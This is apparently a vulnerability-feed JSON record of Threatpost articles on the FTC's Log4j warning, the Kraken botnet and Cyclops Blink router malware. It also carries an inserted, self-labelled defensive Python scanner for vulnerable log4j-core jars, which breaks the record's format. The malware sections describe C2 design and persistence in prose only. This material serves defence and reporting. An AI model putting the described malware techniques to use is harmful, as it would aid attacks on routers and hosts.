[Gramm-Leach-Bliley](<https://www.ftc.gov/tips-advice/business-center/privacy-and-security/gramm-leach-bliley-act>) requires financial institutions to safeguard sensitive data.\n\n\u201cIt is critical that companies and their vendors relying on Log4j act now, in order to reduce the likelihood of harm to consumers, and to avoid FTC legal action,\u201d the FTC urged.\n\nThe FTC means it: Its warning included a reference to the complaints against Equifax, which agreed to pay $700 million to settle actions by the FTC, the Consumer Financial Protection Bureau, and all fifty states over its infamous [2017 data leak](<https://threatpost.com/equifax-says-breach-affects-143-million-americans/127880/>) (consumers\u2019 reaction at the time: [Make it hurt more](<https://threatpost.com/200k-sign-petition-against-equifax-data-breach-settlement/148560/>)).\n\nAccording to the Equifax complaint, its failure to patch a known vulnerability \u201cirreversibly exposed the personal information of 147 million consumers.\u201d Expect more of the same if your company fails to protect consumer data from exposure as a result of Log4Shell or whatever similar, known vulnerabilities crop up, it said.\n\nThe FTC advised companies to use [guidance](<https://www.cisa.gov/uscert/apache-log4j-vulnerability-guidance>) from the Cybersecurity and Infrastructure Security Agency (CISA) to check if they\u2019re using Apache\u2019s Log4j logging library, which is at the heart of the cluster of vulnerabilities known as [Log4Shell](<https://threatpost.com/zero-day-in-ubiquitous-apache-log4j-tool-under-active-attack/176937/>).\n\nCompanies that find that they are using Log4j should do the following, CISA recommended:\n\n * Update your Log4j software package to the [most current version](<https://logging.apache.org/log4j/2.x/security.html>).\n * Consult [CISA guidance](<https://www.cisa.gov/uscert/apache-log4j-vulnerability-guidance>) to mitigate this vulnerability.\n * Ensure remedial steps are taken to 
ensure that your company\u2019s practices do not violate the law. Failure to identify and patch instances of this software may violate [the FTC Act](<https://www.ftc.gov/enforcement/statutes/federal-trade-commission-act>).\n * Distribute this information to any relevant third-party subsidiaries that sell products or services to consumers who may be vulnerable.\n\nOn Dec. 17, CISA issued an [emergency directive](<https://www.cisa.gov/uscert/ncas/current-activity/2021/12/17/cisa-issues-ed-22-02-directing-federal-agencies-mitigate-apache>) mandating federal civilian departments and agencies to immediately patch their internet-facing systems for the Log4j vulnerabilities by Thursday, Dec. 23. Federal agencies were given five more days \u2013 until Dec. 28 \u2013 to report Log4Shell-affected products, including vendor and app names and versions, along with what actions have been taken \u2013 e.g. updated, mitigated, removed from agency network \u2013 to block exploitation attempts.\n\nCISA provides a [dedicated page](<https://www.cisa.gov/uscert/apache-log4j-vulnerability-guidance>) for the Log4Shell flaws with patching information and has released a [Log4j scanner](<https://twitter.com/cisagov/status/1473401212468932609?s=12>) to hunt down potentially vulnerable web services.\n\n## The Log4j Fire Rages Unabated\n\nThe initial flaw \u2013 [CVE-2021-44228](<https://nvd.nist.gov/vuln/detail/CVE-2021-44228>) \u2013 was discovered on Dec. 9 and came under attack within hours. As of Dec. 15, more than 1.8 million attacks, against [half of all corporate networks](<https://threatpost.com/log4j-attacks-state-actors-worm/177088/>), using at least 70 distinct malware families, had already been launched to exploit what became a trio of bugs:\n\n 1. The Log4Shell remote-code execution (RCE) bug that spawned [even nastier mutations](<https://threatpost.com/apache-log4j-log4shell-mutations/176962/>) and which led to \u2026\n 2. 
The [potential for denial-of-service](<https://threatpost.com/apache-patch-log4shell-log4j-dos-attacks/177064/>) (DoS) in Apache\u2019s initial patch. Plus, there was \u2026\n 3. [A third bug](<https://threatpost.com/third-log4j-bug-dos-apache-patch/177159/>), a DoS flaw similar to Log4Shell in that it also affected the logging library. It differed in that it was triggered through Context Map lookups rather than the Java Naming and Directory Interface (JNDI) lookups involved in CVE-2021-44228, in which the logger fetches an object from an attacker-controlled server (an LDAP server, typically) and executes the code that comes back.\n\nAt this point, the Conti ransomware gang has had a [full attack chain](<https://threatpost.com/conti-ransomware-gang-has-full-log4shell-attack-chain/177173/>) in place for weeks.\n\nIn a Monday update, Microsoft said that the end of December [brought no relief](<https://threatpost.com/microsoft-rampant-log4j-exploits-testing/177358/>): The company observed state-sponsored and cyber-criminal attackers probing systems for the Log4Shell flaw through month\u2019s end. \u201cMicrosoft has observed attackers using many of the same inventory techniques to locate targets. Sophisticated adversaries (like nation-state actors) and commodity attackers alike have been observed taking advantage of these vulnerabilities. There is high potential for the expanded use of the vulnerabilities,\u201d Microsoft security researchers warned.\n\n\u201cExploitation attempts and testing have remained high during the last weeks of December. We have observed many existing attackers adding exploits of these vulnerabilities in their existing malware kits and tactics, from coin miners to hands-on-keyboard attacks,\u201d the researchers said.\n\n## Hunting Down Log4j\n\nOne of the most challenging aspects of responding to the Log4j vulnerability is simply identifying the devices in an organization where Log4j is used. 
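Finding where Log4j actually lives is the triage step that sounds easy and is not, because log4j-core rarely sits on disk under its own name: it is usually packed inside a .war, .ear or fat jar. The block below is an added example written for this page, not CISA's scanner or any vendor's tool. It walks a directory tree, opens every archive it finds, recurses into archives stored inside other archives, reads the log4j-core version from the bundled pom.properties, checks whether JndiLookup.class (the class the JNDI lookups run through, and the one Apache's mitigation removes from the jar) is present, and maps the version to the three CVEs listed above. The fix thresholds (2.15.0, 2.16.0, 2.17.0) are the 2.x mainline ones; the 2.12.x and 2.3.x backport branches are not modelled, which is this example's assumption. The sample tree it builds for itself is constructed, not a real artifact.

```python
"""On-disk triage for Log4j 2 (added example for this page; not CISA's
scanner). Finds log4j-core inside .jar/.war/.ear/.zip archives, including
archives nested in other archives, reads the bundled version and checks for
JndiLookup.class. Version thresholds are for the 2.x mainline only
(assumption: the 2.12.x/2.3.x backport branches are not modelled)."""
import io
import os
import re
import tempfile
import zipfile

ARCHIVE_EXT = (".jar", ".war", ".ear", ".zip")
JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"

# First fixed 2.x release for each of the three bugs the article lists.
FIXES = (((2, 15, 0), "CVE-2021-44228"),
         ((2, 16, 0), "CVE-2021-45046"),
         ((2, 17, 0), "CVE-2021-45105"))


def parse_version(text):
    """'2.14.1' -> (2, 14, 1); '2.0-beta9' -> (2, 0, 0); unparsable -> None."""
    m = re.match(r"\s*(\d+)\.(\d+)(?:\.(\d+))?", text)
    if not m:
        return None
    return (int(m.group(1)), int(m.group(2)), int(m.group(3) or 0))


def affected_cves(version):
    """CVEs whose fix release is newer than the version found."""
    if version is None or version[0] != 2:
        return []
    return [cve for fixed, cve in FIXES if version < fixed]


def inspect_archive(data, path):
    """Yield one finding per archive (at any nesting depth) that carries
    log4j-core; recurse into archives stored as entries."""
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return
    with zf:
        names = set(zf.namelist())
        version = None
        if POM_PROPS in names:
            props = zf.read(POM_PROPS).decode("utf-8", "replace")
            for line in props.splitlines():
                if line.startswith("version="):
                    version = parse_version(line.split("=", 1)[1])
        has_jndi = JNDI_CLASS in names
        if has_jndi or version is not None:
            yield {"path": path, "version": version,
                   "has_jndi_lookup": has_jndi, "cves": affected_cves(version)}
        for name in names:
            if name.lower().endswith(ARCHIVE_EXT):
                yield from inspect_archive(zf.read(name), path + "!" + name)


def scan_tree(root):
    """Walk root and return findings for every archive bundling log4j-core."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for fn in files:
            if fn.lower().endswith(ARCHIVE_EXT):
                full = os.path.join(dirpath, fn)
                with open(full, "rb") as fh:
                    findings.extend(inspect_archive(fh.read(), full))
    return findings


def build_sample_tree(root):
    """Constructed fixture, not real artifacts: a 2.14.1 log4j-core nested in
    webapps/app.war, and a 2.17.1 jar with JndiLookup.class stripped."""
    def log4j_jar(version, with_jndi):
        buf = io.BytesIO()
        with zipfile.ZipFile(buf, "w") as zf:
            zf.writestr(POM_PROPS, "groupId=org.apache.logging.log4j\n"
                                   "artifactId=log4j-core\nversion=%s\n" % version)
            if with_jndi:
                zf.writestr(JNDI_CLASS, b"\xca\xfe\xba\xbe")  # class-file magic only
        return buf.getvalue()

    os.makedirs(os.path.join(root, "webapps"), exist_ok=True)
    with zipfile.ZipFile(os.path.join(root, "webapps", "app.war"), "w") as war:
        war.writestr("WEB-INF/lib/log4j-core-2.14.1.jar", log4j_jar("2.14.1", True))
    with open(os.path.join(root, "log4j-core-2.17.1.jar"), "wb") as fh:
        fh.write(log4j_jar("2.17.1", False))


def demo():
    """Build the constructed tree in a temporary directory and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_tree(tmp)
        return scan_tree(tmp)


if __name__ == "__main__":
    for f in demo():
        print(f["path"], f["version"], "JndiLookup" if f["has_jndi_lookup"]
              else "no JndiLookup", f["cves"])
```

Point it at an application root (scan_tree("/opt/app")) and read the path column: a "!" in the path means the jar was found inside another archive, which is exactly the case a plain filename search misses. A jar that reports a vulnerable version but no JndiLookup.class has had the class-removal mitigation applied; a jar at a fixed version still needs the check that nothing older is bundled elsewhere in the same tree.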
The word \u201cubiquitous\u201d has applied since the get-go.\n\n\u201cSince it is a cross-platform, widely used software library, there is incredible diversity in where and how it is deployed: it can be an application package installed by itself, bundled with another application package as just another file on disk or embedded in another application with no visible artifact,\u201d J.J. Guy, co-founder and CEO at Sevco Security, told Threatpost on Wednesday.\n\nHe added, \u201cEven worse, it is used in everything from cloud-managed services to server applications and even fixed-function, embedded devices. That internet-connected toaster is very likely vulnerable to Log4Shell.\u201d\n\nWe\u2019re just in the middle of the triage phase now, Guy said, where basic tools like systems-management or software-management tools to check for the file on disk can provide initial triage.\n\nOne question: What\u2019s the inventory of equipment that still needs to be triaged?\n\n\u201cFor organizational leaders, such as the board, CEO, CIO or CISO, to have confidence in those triage results requires they report not only the machines that have been triaged but also how many are pending triage,\u201d Guy remarked. \u201cReporting the \u2018pending triage\u2019 statistic requires a complete asset inventory, including which machines have been successfully triaged.\u201d\n\nHe called this \u201cone of the larger hidden challenges\u201d in every organization\u2019s response, given that so few have a comprehensive asset inventory, \u201cdespite the fact it has been a top requirement in every security compliance program for decades.\u201d\n\n[_Image courtesy of Quince Media._](<https://commons.wikimedia.org/wiki/File:3D_illustration_image_of_a_gavel_-_auction_hammer_-_free_to_use_in_your_projects_07.jpg>) [_Licensing details_](<https://creativecommons.org/licenses/by-sa/4.0/>)_. 
\n_**Password Reset: [On-Demand Event](<https://threatpost.com/webinars/password-reset-claiming-control-of-credentials-to-stop-attacks/>):** Fortify 2022 with a password-security strategy built for today\u2019s threats. This [Threatpost Security Roundtable](<https://threatpost.com/webinars/password-reset-claiming-control-of-credentials-to-stop-attacks/>), built for infosec professionals, centers on enterprise credential management, the new password basics and mitigating post-credential breaches. Join Darren James, with Specops Software, and Roger Grimes, defense evangelist at KnowBe4, and Threatpost host Becky Bracken. **[Register & stream this FREE session today](<https://threatpost.com/webinars/password-reset-claiming-control-of-credentials-to-stop-attacks/>)** \u2013 sponsored by Specops Software._\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-05T19:00:03", "type": "threatpost", "title": "FTC to Go After Companies that Ignore Log4j", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-01-05T19:00:03", "id": 
"THREATPOST:89AA48C3C48FA427AB660EDEE6DBCBE2", "href": "https://threatpost.com/ftc-pursue-companies-log4j/177368/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-17T22:17:44", "description": "\n\n(Brought to you by Uptycs. Underwriters of Threatpost podcasts do not assert any editorial control over content.)\n\nApplications are cybercriminals\u2019 favorite ways to crack open targeted organizations.\n\nYet no single team or process can assure the rollout of safe cloud applications. From code design to unit testing to deployment, teams and tools have to work together to detect risks early while keeping the pipeline of digital products moving.\n\nAlex Rice, CTO at HackerOne and Johnathan Hunt, VP of Security at GitLab, help development teams evolve their processes to build security directly into their workflows for smooth and safe cloud app rollouts.\n\nThey dropped by the Threatpost podcast recently to share tips on [DevSecOps](<https://threatpost.com/apps-built-better-devsecops-security-silver-bullet/167793/>), including:\n\n * How to build a continual testing, monitoring, and feedback processes to drive down application risk.\n * Developing a continuous approach to application security and DevOps security tools.\n * Why collaboration and continual feedback is essential across development, cloud and security teams.\n\n\u2026as well as how to deal with the boatload of animosity between development and security teams. One tip: Assume positive intent!\n\nHeads-up: Along with Aron Eidleman, Partner Solutions Architect at AWS, Alex and Johnathan will be participating in a joint[ webinar](<https://www.hackerone.com/events/mitigate-risk-cloud-ethical-hackers-and-devops?utm_source=gitlab&utm_medium=partner&utm_campaign=social-mitigate-risk-cloud-with-hackers-devops>) on Feb. 
23 to discuss the importance of layering security practices into your DevOps workflows.\n\nYou can download the podcast below or [listen here](<http://traffic.libsyn.com/digitalunderground/021422_GitLab_HackerOne_Mixdown_1.mp3>). For more podcasts, check out [Threatpost\u2019s podcast site](<https://threatpost.com/category/podcasts/>).\n\n**_Join Threatpost on Wed. Feb 23 at 2 PM ET for a [LIVE roundtable discussion](<https://threatpost.com/webinars/protect-sensitive-cloud-data/?utm_source=Website&utm_medium=Article&utm_id=Keeper+Webinar>) \u201cThe Secret to Keeping Secrets,\u201d sponsored by Keeper Security, focused on how to locate and lock down your organization\u2019s most sensitive data. Zane Bond with Keeper Security will join Threatpost\u2019s Becky Bracken to offer concrete steps to protect your organization\u2019s critical information in the cloud, in transit and in storage. [REGISTER NOW](<https://threatpost.com/webinars/protect-sensitive-cloud-data/?utm_source=Website&utm_medium=Article&utm_id=Keeper+Webinar>) and please Tweet us your questions ahead of time @Threatpost so they can be included in the discussion._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-17T14:00:14", "type": "threatpost", "title": "Kill Cloud Risk: Get Everybody to Stop Fighting Over App Security \u2013 Podcast", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": 
"COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-02-17T14:00:14", "id": "THREATPOST:2C0E12580D3C2F1CE7880F6955D4AA1E", "href": "https://threatpost.com/killing-cloud-risk-bulletproofing-app-security-podcast/178486/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-18T15:37:38", "description": "There\u2019s a new, still-under-development, [Golang](<https://threatpost.com/golang-cryptomining-worm-speed-boost/168456/>)-based botnet called Kraken with a level of brawn that belies its youth: It\u2019s using the [SmokeLoader](<https://threatpost.com/new-loader-variant-behind-widespread-malware-attacks/146683/>) malware loader to spread like wildfire and is already raking in a tidy USD $3,000/month for its operators, researchers report.\n\nThough its name may sound familiar, Kraken has little to do with the [2008 botnet](<https://www.theregister.com/2008/04/07/kraken_botnet_menace/>) of the same name, [wrote](<https://www.zerofox.com/blog/meet-kraken-a-new-golang-botnet-in-development/>) ZeroFox threat researcher Stephan Simon in a Wednesday post.\n\n[](<https://bit.ly/34NwVmo>)\n\nClick to Register for FREE\n\nUsing SmokeLoader to install yet more malicious software on targeted machines, Kraken is picking up hundreds of new bots each time a new command-and-control (C2) server is deployed, according to Simon\u2019s post.\n\nZeroFox came upon the previously unknown botnet, which was still under active development, in late October 2021. 
Even though it was still being developed, it already had the ability to siphon sensitive data from Windows hosts, being able to download and execute secondary payloads, run shell commands, and take screenshots of the victim\u2019s system, ZeroFox said.\n\n## Simple, But Multi-Tentacled\n\nZeroFox shared a screen capture of the initial version of Kraken\u2019s panel \u2013 shown below, when the C2 was still named \u201cKraken Panel\u201d \u2013 which is lean in features. It offered basic statistics, links to download payloads, an option to upload new payloads, and a way to interact with a specific number of bots.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/02/17113451/Krakens-C2-panel-e1645115709526.jpeg>)\n\nEnglish-translated version of the Kraken C2 panel. Source: ZeroFox Intelligence.\n\n\u201cThis version did not appear to allow the operator(s) to choose which victims to interact with,\u201d Simon noted.\n\nBut the current version of Kraken\u2019s C2 panel, shown below, has been completely redesigned and renamed as Anubis. \u201cThe Anubis Panel provides far more information to the operator(s) than the original Kraken Panel,\u201d according to Simon. \u201cIn addition to the previously provided statistics, it is now possible to view command history and information about the victim.\u201d\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/02/17114005/Anubis-panel-for-Kraken-e1645116023649.jpeg>)\n\nDashboard for Kraken\u2019s latest C2 panel, called Anubis. Source: ZeroFox Intelligence.\n\n## Grabbing Cryptocurrency\n\nKraken\u2019s author has been tinkering, adding and deleting capabilities. 
At this point, Kraken can maintain persistence, collect information about the host, download and execute files, run shell commands, take screenshots, and steal various cryptocurrency wallets, including Zcash, Armory, Atomic, Bytecoin, Electrum, Ethereum, Exodus, Guarda and Jaxx Liberty.\n\nLater iterations have gotten yet more replete, with the author having added selective choosing of targets for commands (individually or by group, as opposed to the earlier version having only allowed a bot operator to choose how many victims they\u2019re targeting), task and command history, task ID, command being sent, how many victims the command should be sent to, the targeted geolocation, and a timestamp of when the task was initiated.\n\nAt first, from October to December 2021, the RedLine infostealer was inflicted on victims\u2019 machines every time Kraken struck. RedLine, an increasingly [prevalent](<https://threatpost.com/google-ppc-ads-used-to-deliver-infostealers/166644/>) infostealer, swipes data from browsers, such as saved credentials, autocomplete data and credit card information.\n\nThe malware has since spread its tentacles, though, both in terms of adding other infostealers to the mix and making its operators a boatload of dough. \u201cAs the operator(s) behind Kraken continued to expand and gather more victims, ZeroFox began observing other generic information stealers and cryptocurrency miners being deployed,\u201d according to Simon\u2019s writeup.\n\nAs of Wednesday, the botnet was pulling in around USD $3,000 every month, as shown in the screen capture below from Ethermine.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/02/17120117/mining_stats-e1645117292604.jpg>)\n\nMining statistics from the cryptocurrency mining pool Ethermine. Source: ZeroFox Intelligence.\n\nWhat does the operator plan to do with the new bot and all the data its infostealers are sucking up? 
It\u2019s unknown at this point, ZeroFox researchers concluded: \u201cIt is currently unknown what the operator intends to do with the stolen credentials that have been collected or what the end goal is for creating this new botnet.\u201d\n\n## Steering Clear\n\nZeroFox passed on these recommendations to keep Kraken from tangling up your systems:\n\n * Ensure antivirus and intrusion detection software is up to date with all patches and rule sets.\n * Enable two-factor authentication for all organizational accounts to help mitigate phishing and credential stuffing attacks.\n * Maintain regularly scheduled backup routines, including off-site storage and integrity checks.\n * Avoid opening unsolicited attachments and never click suspicious links.\n * Log and monitor all administrative actions as much as possible. Alert on any suspicious activity.\n * Review network logs for potential signs of compromise and data egress.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-17T17:28:02", "type": "threatpost", "title": "Baby Golang-Based Botnet Already Pulling in $3K/Month for Operators", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, 
"obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-02-17T17:28:02", "id": "THREATPOST:E8A3AD011F9759F38AAB48D776396878", "href": "https://threatpost.com/golang-botnet-pulling-in-3k-month/178509/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-18T17:24:48", "description": "The modular botnet known as Cyclops Blink, linked to the same advanced persistent threat (APT) behind the [NotPetya wiper attacks](<https://threatpost.com/merck-insurance-payout-notpetya-attack/177872/>), is expanding its device targeting to include ASUS routers.\n\nFurther, it\u2019s likely that the botnet\u2019s purpose is far more sinister than the average [Mirai-knockoff\u2019s penchant](<https://threatpost.com/mirai-variant-sonicwall-d-link-iot/164811/>) for distributed denial-of-service (DDoS) attacks.\n\nThat\u2019s the word from Trend Micro researchers, who noted that Cyclops Blink casts a wide net in terms of the owners of the devices it chooses to infect, with no specific focus on high-value government or diplomatic entities. While that\u2019s out of step with typical APT behavior, researchers said that it\u2019s likely the botnet will be used as persistent infrastructure for mounting further attacks on high-value targets, and as such, should be indiscriminately distributed for maximum effect.\n\n\u201cIt should be noted that these victims do not appear to be evidently valuable targets for either economic, military or political espionage,\u201d according to the firm\u2019s analysis. 
\u201cFor example, some of the live command-and-control servers (C2s) are hosted on WatchGuard devices used by a law firm in Europe, a medium-sized company producing medical equipment for dentists in Southern Europe and a plumber in the United States.\u201d\n\nCyclops Blink itself has been around since 2019, initially looking to infect WatchGuard Firebox devices, according to a [February analysis (PDF)](<https://www.ncsc.gov.uk/files/Cyclops-Blink-Malware-Analysis-Report.pdf>) performed by the UK\u2019s National Cyber Security Centre (NCSC). Now, to further its goal of widescale infections, ASUS routers are on the menu, Trend Micro noted, with the latest variant incorporating a fresh module tailored to the vendor\u2019s devices.\n\n\u201cOur research was carried out on the RT-AC68U, but other ASUS routers such as RT-AC56U might be affected as well,\u201d researchers said. \u201cOur investigation shows that there are more than 200 Cyclops Blink victims around the world. Typical countries of infected WatchGuard devices and ASUS routers are the United States, India, Italy, Canada and a long list of other countries, including Russia.\u201d\n\n## **A Sinister Purpose?**\n\nCyclops Blink is the handiwork of the Russian-speaking Sandworm APT (a.k.a. 
Voodoo Bear or TeleBots), according to Trend Micro \u2013 the same group that\u2019s been [linked to a host of](<https://threatpost.com/doj-charges-6-sandworm-apt-members-in-notpetya-cyberattacks/160304/>) very high-profile state-sponsored attacks, as well as the VPNFilter internet-of-things (IoT) botnet.\n\n\u201cSandworm was also responsible for\u2026the [2015 and 2016 attacks on the Ukrainian electrical grid](<https://threatpost.com/notpetya-linked-to-industroyer-attack-on-ukraine-energy-grid/138287/>), the 2017 NotPetya attack, the 2017 French presidential campaign, the [2018 Olympic Destroyer attack](<https://threatpost.com/olympic-destroyer-malware-behind-winter-olympics-cyberattack-researchers-say/129918/>) on the Winter Olympic Games and a 2018 operation against the Organization for the Prohibition of Chemical Weapons (OPCW),\u201d researchers noted in a [Thursday analysis](<https://www.trendmicro.com/en_us/research/22/c/cyclops-blink-sets-sights-on-asus-routers--.html>).\n\nInternet routers have been a favorite target for building out botnets for many years, thanks to \u201cinfrequency of patching, the lack of security software and the limited visibility of defenders\u201d when it comes to these devices, as Trend Micro put it. More often than not, such botnets are used to carry out DDoS attacks; but in Cyclops Blink\u2019s case, the motives are less obvious.\n\n\u201cThe purpose of this botnet is still unclear: Whether it is intended to be used for DDoS attacks, espionage or proxy networks remains to be seen,\u201d researchers said. 
\u201cBut what is evident is that Cyclops Blink is an advanced piece of malware that focuses on persistence and the ability to survive domain sinkhole attempts and the takedown of its infrastructure.\u201d\n\nIn fact, some of the infected devices that researchers observed have been compromised for more than two and a half years, with some set up as stable C2 servers for other bots.\n\nIt is thus likely, the researchers speculated, that Cyclops Blink is destined for bigger horizons than denial of service.\n\n\u201cThe more routers are compromised, the more sources of powerful data collection \u2014 and avenues for further attacks \u2014 become available to attackers,\u201d according to the analysis, which raised the specter of \u201ceternal botnets.\u201d\n\n\u201cOnce an IoT device is infected with malware, an attacker can have unrestricted internet access for downloading and deploying more stages of malware for reconnaissance, espionage, proxying or anything else that the attacker wants to do,\u201d researchers warned. \u201cThe underlying operating systems for the majority of IoT devices is Linux, which is also used by many powerful systems tools. This can allow attackers to add anything else that they might need to complete their attacks.\u201d\n\nGiven Sandworm\u2019s track record, it\u2019s wise to expect the worst, the firm noted.\n\n\u201cSandworm\u2019s previous high-profile victims and their attacks\u2019 substantial impact on these organizations are particularly worrying \u2014 even more so for a group that quickly learns from past errors, comes back stronger time and time again, and for whom international repercussions seem minimal at best,\u201d researchers said.\n\n## **A Few Technical Specifics on a New Botnet Variant**\n\nCoded in the C language, Cyclops Blink relies on hard-coded TCP ports to communicate with a range of command-and-control servers (C2s), according to the analysis. 
For each port, it creates a rule in the Netfilter Linux kernel firewall to allow output communication to it.\n\nOnce it\u2019s made contact, the malware initializes an OpenSSL library, and its core component then cranks up operations for a series of hard-coded modules.\n\n\u201cCommunication with the modules is performed via pipes,\u201d according to Trend Micro. \u201cFor each hard-coded module, the malware creates two pipes before executing them in their own child processes.\u201d\n\nThe malware then pushes various parameters to the modules, which in turn respond with data that the core component encrypts with OpenSSL functions before sending it to the C2 server.\n\n\u201cThe data is encrypted using AES-256 in cipher block chaining (CBC) mode with a randomly generated 256-bit key and 128-bit initialization vector (IV). It is then encrypted using a hard-coded RSA-2560 (320-bit) public key unique to each sample,\u201d according to the analysis. \u201cThe C2 server must have the corresponding RSA private key to decrypt the data.\u201d\n\nResearchers added, \u201cTo send data to the C2 server, the core component performs a TLS handshake with a randomly chosen C2 server at a random TCP port, both of which are from a hard-coded list.\u201d\n\nInitially, the core component sends a list of supported commands to the C2 server and then waits to receive one of the commands back. 
These can be aimed at the core component itself or at one of its modules, according to the writeup.\n\nIf a command targets the core component, it can be one of the following:\n\n * Terminate the program\n * Bypass the data-sending interval and send data to C2 servers immediately\n * Add a new C2 server to the list in memory\n * Set time to send the next packet to the C2 server\n * Set time to send the next packet to the C2 server\n * Add a new module (an ELF file should be received following the command)\n * Reload the malware\n * Set the local IP address parameter\n * Set a new worker ID\n * Set an unknown byte value\n * Resend configuration to all running modules\n\nAs for the commands meant for the modules, the latest variant studied by Trend Micro now includes \u201cAsus (0x38),\u201d meant to activate a brand-new module built to infect ASUS routers.\n\n## **Targeting ASUS Routers**\n\nThe ASUS module is built to access and replace a router\u2019s flash memory, thus enslaving it to the botnet, researchers explained.\n\n\u201cThis module can read and write from the devices\u2019 flash memory,\u201d they said. 
\u201cThe flash memory is used by these devices to store the operating system, configuration and all files from the file system.\u201d\n\nCyclops Blink reads 80 bytes from the flash memory, writes them to the main pipe, and then waits for a command with the data needed to replace the content.\n\n\u201cAs the flash memory content is permanent, this module can be used to establish persistence and survive factory resets,\u201d researchers explained.\n\nA second module, straightforwardly called \u201csystem reconnaissance (0x08),\u201d is responsible for gathering various data from the infected device and sending it to the C2 server.\n\nSpecifically, it harvests:\n\n * The Linux version of the device\n * Information about the device\u2019s memory consumption\n * The SSD storage information\n * The content of the following files:\n   * /etc/passwd\n   * /etc/group\n   * /proc/mounts\n   * /proc/partitions\n * Information about network interfaces\n\nA third module, \u201cfile download (0x0f),\u201d can download files from the internet using DNS over HTTPS (DoH).\n\nTrend Micro noted that ASUS is likely not the only new module that will emerge for the botnet. After all, Sandworm\u2019s previous botnet, VPNFilter, targeted a wide range of router vendors, including ASUS, D-Link, Huawei, Linksys, MikroTik, Netgear, QNAP, TP-Link, Ubiquiti, UPVEL and ZTE.\n\n\u201cWe have evidence that other routers are affected too, but as of reporting, we were not able to collect Cyclops Blink malware samples for routers other than WatchGuard and ASUS,\u201d according to the analysis. \u201cBased on our observation, we strongly believe that there are more targeted devices from other vendors. 
This malware is modular in nature, and it is likely that each vendor has different modules and architectures that were thought out well by the Cyclops Blink actors.\u201d\n\n## **How to Defend Against Becoming a Botnet Victim**\n\nLike with other botnets, organizations can protect themselves from Cyclops Blink attacks by falling back on basic security hygiene, Trend Micro noted, including the use of strong passwords, using a virtual private network (VPN), regular firmware patching and so on. Most successful compromises are the result of default or weak password use or the exploitation of known vulnerabilities.\n\nIf an organization\u2019s devices have been infected with Cyclops Blink, researchers said that the best course of action is to chuck the victimized router for a new one, given the malware\u2019s prodigious persistence capabilities.\n\n\u201cIt is best to get a new router,\u201d they explained. \u201cPerforming a factory reset might blank out an organization\u2019s configuration, but not the underlying operating system that the attackers have modified. If a particular vendor has firmware updates that can address a Cyclops Blink attack or any other weakness in the system, organizations should apply these as soon as possible. However, in some 